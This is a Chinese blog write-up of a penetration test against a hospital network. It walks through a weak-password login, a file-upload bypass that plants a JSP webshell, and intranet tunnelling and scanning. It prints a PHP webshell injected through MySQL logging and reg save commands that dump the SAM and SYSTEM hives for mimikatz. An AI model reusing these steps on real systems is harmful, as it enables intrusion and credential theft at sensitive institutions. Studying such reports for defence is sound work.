实战|某医院从点到为止到拔网线...

admin 2023年4月14日18:55:11实战|某医院从点到为止到拔网线...已关闭评论33 views字数 2094阅读6分58秒阅读模式

1前言

接到一个紧急测试任务,只有一个目标名称(某某医院)和一个ip。

2拿下shell

首先,使用goby一把梭对拿到的ip来个全端口扫描:

图片

服务包括Weblogic,jboss,springboot,Struts2,以及其他各式各样的系统(简直就是Nday练习靶场)

其中尝试了利用jexboss打jboss反序列化,Weblogic的反序列化(10.3.6.0版本),Weblogic的其他CVE漏洞利用,springboot的未授权,Struts2的反序列化漏洞均失败

但是在8282端口的临床技能中心管理平台发现了弱口令

(admin/admin)可成功登陆到后台:

图片

经过测试,目标的字典管理下的屏幕信息管理系统的设置显示图片处存在任意文件上传

只需要将png后缀的jsp马上传,在利用BurpSuite直接抓包改为jsp后缀即可

图片

图片

上传完毕后,访问目标url,webshell存在,但是利用Godzilla直接连接会失败

图片

经hum大师傅的发现,在链接时需要带上当前页面的cookie(这里目标对url做了强制跳转,如果未登陆,都会条回到Login页面。

这样的话webshell的url就无法正常访问了)带上cookie即可正常连接(cookie到期后,webshell便会掉)。

图片

图片

连接成功后,为了稳定webshell,我们尝试将webshell写入到根目录和静态文件的目录,但是仍会受到强制跳转的影响。

于是将webshell内容写入到了在登陆前就能访问的jsp正常文件中,来稳定shell。

3内网过程

之后对目标进行了信息搜集,入口web服务器为Linux主机,不出网,无法上传大文件,web路径存在强制跳转,IP为172.20.10.49

首先尝试了Neo-reGeorg,将webshell写入到网站根目录,带上cookie进行代理,失败(猜测原因可能还是应为网站的强制跳转问题)

之后尝试pystinger(毒刺),在将Server和webshell上传到目标机器后,发现无法正常执行(程序报错,而且似乎时代码错误)

于是又再次换回了Neo-reGeorg,这次尝试将目标网站中的某一个正常jsp页面替换为我们的Neo-reGeorg的tunnel.jsp内容

发现目标无强制跳转(猜测目标是根据文件名来进行的强制跳转,且为白名单),本地尝试连接,代理正常(报错不影响)。

尝试利用Ladon走正向代理扫描内网(命令为Ladon.exe 172.20.10.1/24 WebScan),扫描结果如下

图片

发现目标存在phpStudy探针页面,且该探针页面存在mysql弱口令root,root

图片

图片

扫目录发现,该IP下还存在phpmyadmin页面,可利用root,root登陆

图片

经过测试,该数据库用户没有outfile的导出权限,但是可以通过日志getshell

图片

将general_log_file改为网站根目录下的222.php

执行select <?php phpinfo(); assert($_POST['cmd']);?>即可getshell

图片

图片

发现该台主机为Windows主机,system权限,仍不出网

通过tasklist查看进程加杀软比对,发现目标主机存在卡巴斯基(进程为avp.exe)

图片

CobaltZirs0n大师尝试利用卷影拷贝方式获取目标SYSTEM,SECURITY,SAM文件本地离线解密,但是运行wmic shadowcopy call create Volume='C:'   命令后,利用vssadmin list shadows查询时,爆出错误,提示没有注册类

图片

由于是system权限,尝试直接利用powershell 操作注册表导出文件


reg save hklm\system SYSTEM
reg save hklm\security SECURITY
reg save hklm\sam SAM

图片

利用mimikatz成功解密获取hash(密码解不出)

图片

此时有三种方式登陆远程桌面

1.直接添加账户(卡巴斯基不拦截)

2.添加影子账户

3.利用mimikatz做pth来使hash覆盖mstsc登陆administrator用户

这里选择添加了一个账户登陆,并打算利用该台主机做代理,来利用fscan扫描内网(后续关站了,没有继续深入)

至此,应该是管理员发现了内网的动静,直接反手关站图片。

Taps:


免责声明:本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

                       扫码回复“进群”加入交流群

                      图片

往期精彩

回复“burp”“awvs”“nessus”“ladon”"Forfity"等可以获取工具。

【安全基础】信息收集看这一篇就够了

快速攻击全自动化工具JuD

Exp-Tools 1.1.3版本发布

GUI-tools渗透测试工具箱框架

阿波罗自动化攻击评估系统

 微软 Word RCE附PoC

Clash最新远程代码执行漏洞(附POC)

禅道系统权限绕过与命令执行漏洞(附POC)

【附EXP】CVE-2022-40684 & CVE-2022-22954

网络安全应急预案合集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月14日18:55:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战|某医院从点到为止到拔网线...http://cn-sec.com/archives/1671251.html